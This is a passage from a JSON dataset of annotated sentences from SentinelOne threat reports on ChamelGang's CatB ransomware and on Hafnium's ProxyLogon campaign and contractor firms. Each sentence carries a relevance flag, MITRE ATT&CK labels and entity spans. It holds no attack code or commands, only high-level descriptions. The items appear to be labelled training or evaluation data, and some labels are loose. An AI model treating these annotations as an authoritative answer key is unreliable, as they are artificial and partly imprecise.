ChamelGang’s CatB ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Targeted institutions with CatB ransomware", "entities": [ { "text": "ChamelGang", "start": 87, "end": 97, "label": "ThreatActor" }, { "text": "CatB ", "start": 100, "end": 105, "label": "MalwareTool" }, { "text": "ransomware", "start": 105, "end": 115, "label": "Action" } ] }, { "uid": "sentinel-56_SentinelOne_report-p1-s12-bd1b6a", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "We discovered strong indicators pointing to these institutions as being targeted using ChamelGang’s CatB ransomware.", "sentence_text": "BestCrypt & BitLocker", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s13-1b5c8e", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "BestCrypt & BitLocker", "sentence_text": "In addition to the ChamelGang activities, we have observed intrusions involving abuse of Jetico BestCrypt and Microsoft BitLocker to encrypt endpoints as a means to demand ransom.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Abused programs to encrypt endpoints to demand ransom", "entities": [ { "text": "ChamelGang ", "start": 19, "end": 30, "label": "ThreatActor" }, { "text": "abuse ", "start": 80, "end": 86, "label": "Action" }, { "text": "Jetico BestCrypt", "start": 89, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "Microsoft BitLocker", "start": 110, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "encrypt endpoints", "start": 133, "end": 150, "label": "Action" }, { "text": "to demand ransom", "start": 162, "end": 178, "label": "Action" } ] }, { "uid": "sentinel-56_SentinelOne_report-p1-s14-86ce84", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "In addition to the ChamelGang activities, we have observed intrusions involving abuse of Jetico BestCrypt and Microsoft BitLocker to encrypt endpoints as a means to demand ransom.", "sentence_text": "BestCrypt and BitLocker are used legitimately for data protection purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s15-e26e2b", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "BestCrypt and BitLocker are used legitimately for data protection purposes.", "sentence_text": "The manufacturing sector was the most significantly affected, with other sectors, including education, finance, healthcare, and legal, being impacted to a lesser extent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s16-ef97cb", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "The manufacturing sector was the most significantly affected, with other sectors, including education, finance, healthcare, and legal, being impacted to a lesser extent.", "sentence_text": "Misattributing cyberespionage activities as cybercriminal operations can result in strategic repercussions, especially in the context of attacks on government or critical infrastructure organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s17-1c0c6d", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "Misattributing cyberespionage activities as cybercriminal operations can result in strategic repercussions, especially in the context of attacks on government or critical infrastructure organizations.", "sentence_text": "SentinelLABS continues to monitor cyberespionage groups that challenge traditional categorization practices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s18-fa5fd4", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "SentinelLABS continues to monitor cyberespionage groups that challenge traditional categorization practices.", "sentence_text": "We remain committed to sharing our insights to equip organizations and other relevant stakeholders with the necessary knowledge to better understand and defend against this threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s19-80c411", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "We remain committed to sharing our insights to equip organizations and other relevant stakeholders with the necessary knowledge to better understand and defend against this threat.", "sentence_text": "We are grateful to Still Hsu from TeamT5 for providing invaluable insights that contributed to our research on the ChamelGang APT group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s20-64fee4", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "We are grateful to Still Hsu from TeamT5 for providing invaluable insights that contributed to our research on the ChamelGang APT group.", "sentence_text": "Read the Full Report adversary Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s21-0007d7", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "Read the Full Report adversary Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "sentence_text": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s22-67b8ab", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "sentence_text": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-56_SentinelOne_report-p1-s23-c575d1", "source": "sentinel", "doc_id": "56_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "sentence_text": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s1-3008b9", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "China’s Covert Capabilities | Silk Spun From Hafnium | SentinelOne Advanced Persistent Threat China’s Covert Capabilities | Silk Spun From Hafnium Dakota Cary / July 30, 2025 Executive Summary SentinelLABS identified 10+ patents for highly intrusive forensics and data collection technologies that were registered by companies named in U.S. indictments as working on behalf of the Hafnium threat actor group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s2-4192fd", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "China’s Covert Capabilities | Silk Spun From Hafnium | SentinelOne Advanced Persistent Threat China’s Covert Capabilities | Silk Spun From Hafnium Dakota Cary / July 30, 2025 Executive Summary SentinelLABS identified 10+ patents for highly intrusive forensics and data collection technologies that were registered by companies named in U.S. indictments as working on behalf of the Hafnium threat actor group.", "sentence_text": "The indictment outlined that Xu and Zhang worked for two firms previously unattributed in the public domain to the Hafnium (aka Silk Typhoon) threat actor group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s3-599ab0", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "The indictment outlined that Xu and Zhang worked for two firms...", "sentence_text": "Hafnium has a long history of attacks against defense contractors, policy think tanks, higher education, and infectious disease research institutions, with an exceptionally prolific 2021 campaign that exploited several 0-day vulnerabilities in Microsoft Exchange Server (MES).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit 0-day vulnerabilities in Microsoft Exchange Server (MES) during the 2021 campaign.", "entities": [ { "text": "Hafnium", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "exploited several 0-day vulnerabilities in Microsoft Exchange Server (MES)", "start": 201, "end": 275, "label": "Action" }, { "text": "Microsoft Exchange Server (MES)", "start": 244, "end": 275, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s4-0f921f", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Hafnium has a long history of attacks against defense contractors, policy think tanks, higher education, and infectious disease research institutions, with an exceptionally prolific 2021 campaign that exploited several 0-day vulnerabilities in Microsoft Exchange Server (MES).", "sentence_text": "Hafnium’s history of exploits and 0day use, combined with its targets and observed campaigns make it one of China’s best APTs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s5-8dc6f0", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Hafnium’s history of exploits and 0day use, combined with its targets and observed campaigns make it one of China’s best APTs.", "sentence_text": "This research resulted in three key findings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s6-74c230", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "This research resulted in three key findings.", "sentence_text": "We identified previously unobserved or unreported offensive tooling owned by Hafnium-associated companies named in U.S. indictments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s7-dc847e", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "We identified previously unobserved or unreported offensive tooling owned by Hafnium-associated companies named in U.S. indictments.", "sentence_text": "The tooling raises questions about these firms’ on-going work in support of the MSS and how attribution is difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s8-1eb4bc", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "The tooling raises questions about these firms’ on-going work in support of the MSS and how attribution is difficult.", "sentence_text": "The company holds at least one patent on software designed to remotely recover files from Apple computers, which has not been documented as a capability used by Hafnium or any related threat actor groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s9-f99a81", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "The company holds at least one patent on software designed to remotely recover files from Apple computers, which has not been documented as a capability used by Hafnium or any related threat actor groups.", "sentence_text": "The DOJ indictment provides new insights into the tiers of relationships between hackers and their customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s10-b8602c", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "The DOJ indictment provides new insights into the tiers of relationships between hackers and their customers.", "sentence_text": "This report raises important questions about the extent to which the MSS and its regional offices offer operational support to its contracted hackers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s11-f5cbbe", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "This report raises important questions about the extent to which the MSS and its regional offices offer operational support to its contracted hackers.", "sentence_text": "Our research delves into several companies tied to the indicted Hafnium-affiliated hackers and documents their relationships.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s12-bc36f5", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "Our research delves into several companies tied to the indicted Hafnium-affiliated hackers and documents their relationships.", "sentence_text": "This new insight into the Hafnium-affiliated firms’ capabilities highlights an important deficiency in the threat actor attribution space: threat actor tracking typically links campaigns and clusters of activity to a named actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s13-712d8f", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "This new insight into the Hafnium-affiliated firms’ capabilities highlights an important deficiency in the threat actor attribution space: threat actor tracking typically links campaigns and clusters of activity to a named actor.", "sentence_text": "Hafnium’s Impact\nIt’s rare for a hacking team to behave so recklessly that it changes a country’s foreign policy and unify the E.U., U.K., and U.S. into speaking with one voice, but Hafnium wouldn’t be famous if they hadn’t done that.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s14-1137ff", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Hafnium’s Impact\nIt’s rare for a hacking team to behave so recklessly that it changes a country’s foreign policy and unify the E.U., U.K., and U.S. into speaking with one voice, but Hafnium wouldn’t be famous if they hadn’t done that.", "sentence_text": "Hafnium gained fame following the revelation of their stealthy access to U.S. Government emails through an MES vulnerability known as ProxyLogon, which came to light in March 2021.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087.003", "name": "Email Account" } ], "procedure": "Gained access to emails through vulnerability", "entities": [ { "text": "Hafnium ", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "ProxyLogon", "start": 134, "end": 144, "label": "Infrastructure_Indicator" }, { "text": "access to U.S. Government emails through an MES vulnerability", "start": 63, "end": 124, "label": "Action" }, { "text": "emails ", "start": 89, "end": 96, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s15-44d488", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "Hafnium gained fame following the revelation of their stealthy access to U.S. Government emails through an MES vulnerability known as ProxyLogon, which came to light in March 2021.", "sentence_text": "But the group is often wrongly blamed for what happened next.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s16-293fbb", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "But the group is often wrongly blamed for what happened next.", "sentence_text": "The name Hafnium became associated with the wider abuse of the ProxyLogon vulnerabilities that followed the original Hafnium activity as lesser tier threat groups flooded the zone with exploitation attempts to opportunistically deliver payloads ranging from espionage to ransomware.\nalerted\nits Microsoft Advanced Protection Program partners to some POC code on February 23.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Abuse ProxyLogon vulnerabilities to deliver payloads (espionage tools, ransomware)", "entities": [ { "text": "Hafnium ", "start": 9, "end": 17, "label": "ThreatActor" }, { "text": "ProxyLogon ", "start": 63, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "abuse of the ProxyLogon vulnerabilities", "start": 50, "end": 89, "label": "Action" }, { "text": "exploitation attempts to opportunistically deliver payloads ranging from espionage to ransomware", "start": 185, "end": 281, "label": "Action" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s17-eab2c0", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "The name Hafnium became associated with the wider abuse of the ProxyLogon vulnerabilities that followed the original Hafnium activity as lesser tier threat groups flooded the zone with exploitation attempts to opportunistically deliver payloads ranging from espionage to ransomware.\nalerted\nits Microsoft Advanced Protection Program partners to some POC code on February 23.", "sentence_text": "This program provides some select cybersecurity companies early access to powerful new exploits, so they can better defend their customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s18-565b8f", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "This program provides some select cybersecurity companies early access to powerful new exploits, so they can better defend their customers.", "sentence_text": "Five days later on February 28th , new Chinese state-affiliated and criminal hacking groups began exploiting the vulnerability at an immense scale.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploiting vulnerability", "entities": [ { "text": "Chinese state-affiliated", "start": 39, "end": 63, "label": "ThreatActor" }, { "text": "hacking groups", "start": 77, "end": 91, "label": "ThreatActor" }, { "text": "exploiting the vulnerability", "start": 98, "end": 126, "label": "Action" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s19-2fe9a4", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Five days later on February 28th , new Chinese state-affiliated and criminal hacking groups began exploiting the vulnerability at an immense scale.", "sentence_text": "It remains unclear how exactly the exploit proliferated ahead of the patch.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s20-803d0e", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "It remains unclear how exactly the exploit proliferated ahead of the patch.", "sentence_text": "The longer tail of the problem arises from the prevalence of webshells littered by each attacker’s use of ProxyLogon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s21-19539f", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "The longer tail of the problem arises from the prevalence of webshells littered by each attacker’s use of ProxyLogon.", "sentence_text": "These groups left shells on vulnerable servers allowing access to these servers even after the vulnerability itself was patched.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Webshells left on servers to allow access", "entities": [ { "text": "left shells", "start": 13, "end": 24, "label": "Action" }, { "text": "allowing access", "start": 47, "end": 62, "label": "Action" }, { "text": "vulnerable servers", "start": 28, "end": 46, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-57_SentinelOne_report-p1-s22-fb1c04", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "These groups left shells on vulnerable servers allowing access to these servers even after the vulnerability itself was patched.", "sentence_text": "The situation was so dire that the DOJ received its first court authorization for the FBI to remove these shells en masse from compromised servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s23-647c9c", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "The situation was so dire that the DOJ received its first court authorization for the FBI to remove these shells en masse from compromised servers.", "sentence_text": "The rapid dissemination and exploitation of the vulnerability led the U.S., U.K., and E.U. to issue their first ever joint statement condemning PRC actions in cyberspace in July 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s24-9a8ece", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "The rapid dissemination and exploitation of the vulnerability led the U.S., U.K., and E.U. to issue their first ever joint statement condemning PRC actions in cyberspace in July 2021.", "sentence_text": "The statement roiled CCP policymakers who had previously fended off such joint decrees by convincing one E.U. state to reject such declarations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s25-81349d", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "The statement roiled CCP policymakers who had previously fended off such joint decrees by convincing one E.U. state to reject such declarations.", "sentence_text": "Because the E.U. requires unanimous consent for foreign policy statements, the fallout from the wanton abuse of the vulnerability upended China’s foreign policy success.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s26-8ca5f3", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "Because the E.U. requires unanimous consent for foreign policy statements, the fallout from the wanton abuse of the vulnerability upended China’s foreign policy success.", "sentence_text": "The joint statement so perturbed CCP policymakers that the country launched an offensive public opinion campaign against U.S. hacking operations that continues today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s27-fa6a6b", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "The joint statement so perturbed CCP policymakers that the country launched an offensive public opinion campaign against U.S. hacking operations that continues today.", "sentence_text": "Before the July 2021 joint statement, the PRC did not coordinate cyber threat intelligence publications with state propaganda outlets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s28-496fcd", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "Before the July 2021 joint statement, the PRC did not coordinate cyber threat intelligence publications with state propaganda outlets.", "sentence_text": "China now regularly releases propaganda pieces alongside cyber threat intelligence reports–the change was completely prompted by the success the U.S. had in unifying the European Union behind a joint statement, which was itself enabled by China’s behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s29-c293f1", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "China now regularly releases propaganda pieces alongside cyber threat intelligence reports–the change was completely prompted by the success the U.S. had in unifying the European Union behind a joint statement, which was itself enabled by China’s behavior.", "sentence_text": "Hafnium’s False Start or The Less Capable Cluster?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s30-3909b1", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "Hafnium’s False Start or The Less Capable Cluster?", "sentence_text": "The Treasury sanctions announced in January 2025 were quickly followed by a March DOJ indictment of Yin and a business associate, Zhou Shuai (周帅).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s31-949f27", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "The Treasury sanctions announced in January 2025 were quickly followed by a March DOJ indictment of Yin and a business associate, Zhou Shuai (周帅).", "sentence_text": "Two separate indictments were released for Yin in March.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s32-fd69ee", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Two separate indictments were released for Yin in March.", "sentence_text": "The first document is dated 2017 and only Yin is named as the defendant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s33-cbebdb", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "The first document is dated 2017 and only Yin is named as the defendant.", "sentence_text": "The second indictment is dated 2023 and lists both Yin and Zhou.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s34-11a2c9", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The second indictment is dated 2023 and lists both Yin and Zhou.", "sentence_text": "The March 2025 indictment of Zhou and Yin indicate that Zhou brokered the sale of Yin’s work through iSoon, a company whose internal chats and corporate records were leaked online in early 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s35-898428", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "The March 2025 indictment of Zhou and Yin indicate that Zhou brokered the sale of Yin’s work through iSoon, a company whose internal chats and corporate records were leaked online in early 2024.", "sentence_text": "Leaked chats showed iSoon executives considering a merger and acquisition of Zhou’s Shanghai-based company.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s36-a7f55a", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "Leaked chats showed iSoon executives considering a merger and acquisition of Zhou’s Shanghai-based company.", "sentence_text": "iSoon executives also chastised Zhou for being a mere broker.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s37-659229", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "iSoon executives also chastised Zhou for being a mere broker.", "sentence_text": "The DOJ press release for the indictments indicate that Yin’s and Zhou’s activities were tracked under various naming conventions and clusters, including Silk Typhoon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s38-4d5583", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "The DOJ press release for the indictments indicate that Yin’s and Zhou’s activities were tracked under various naming conventions and clusters, including Silk Typhoon.", "sentence_text": "Hafnium and Other Elements Following the July 2025 released indictment of Xu Zewei and Zhang Yu, the number of people alleged to work for Hafnium grew to four and the number of companies involved grew to three.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s39-6c04bf", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "Hafnium and Other Elements Following the July 2025 released indictment of Xu Zewei and Zhang Yu, the number of people alleged to work for Hafnium grew to four and the number of companies involved grew to three.", "sentence_text": "The DOJ maintains that Xu Zewei and Zhang Yu worked at the “direction” of Shanghai State Security Bureau (SSSB).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s40-136373", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "The DOJ maintains that Xu Zewei and Zhang Yu worked at the “direction” of Shanghai State Security Bureau (SSSB).", "sentence_text": "Xu Zewei completed his tasking while working at Shanghai Powerock Network Company (上海势岩网络科技发展有限公司); Zhang Yu worked at Shanghai Firetech Information Science and Technology Company (上海势炎信息科技有限公司).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s41-26da40", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "Xu Zewei completed his tasking while working at Shanghai Powerock Network Company (上海势岩网络科技发展有限公司); Zhang Yu worked at Shanghai Firetech Information Science and Technology Company (上海势炎信息科技有限公司).", "sentence_text": "This “directed” nature of the relationship between the SSSB and these two companies contours the tiered system of offensive hacking outfits in China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s42-3db972", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "This “directed” nature of the relationship between the SSSB and these two companies contours the tiered system of offensive hacking outfits in China.", "sentence_text": "Far from being an offensive shop procuring initial access and intelligence in the hopes of finding a willing buyer, as in the case of i-Soon, Shanghai Firetech worked on specific tasking handed down from MSS officers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s43-631fed", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "Far from being an offensive shop procuring initial access and intelligence in the hopes of finding a willing buyer, as in the case of i-Soon, Shanghai Firetech worked on specific tasking handed down from MSS officers.", "sentence_text": "China experts\nand law enforcement distinguish between China’s operational structures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s44-6e52ba", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "China experts\nand law enforcement distinguish between China’s operational structures.", "sentence_text": "At the lowest tier of the contracting ecosystem are bottom feeders, like i-Soon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s45-251920", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "At the lowest tier of the contracting ecosystem are bottom feeders, like i-Soon.", "sentence_text": "The tier of contractors the Chinese government holds closest are actors like Xu Zewei and Zhang Yu.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s46-f5eda8", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "The tier of contractors the Chinese government holds closest are actors like Xu Zewei and Zhang Yu.", "sentence_text": "But the MSS has not completely abandoned state-run operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-57_SentinelOne_report-p1-s47-0e2eac", "source": "sentinel", "doc_id": "57_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "But the MSS has not completely abandoned state-run operations.", "sentence_text": "Past DOJ indictments show that other MSS offices do indeed use front companies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 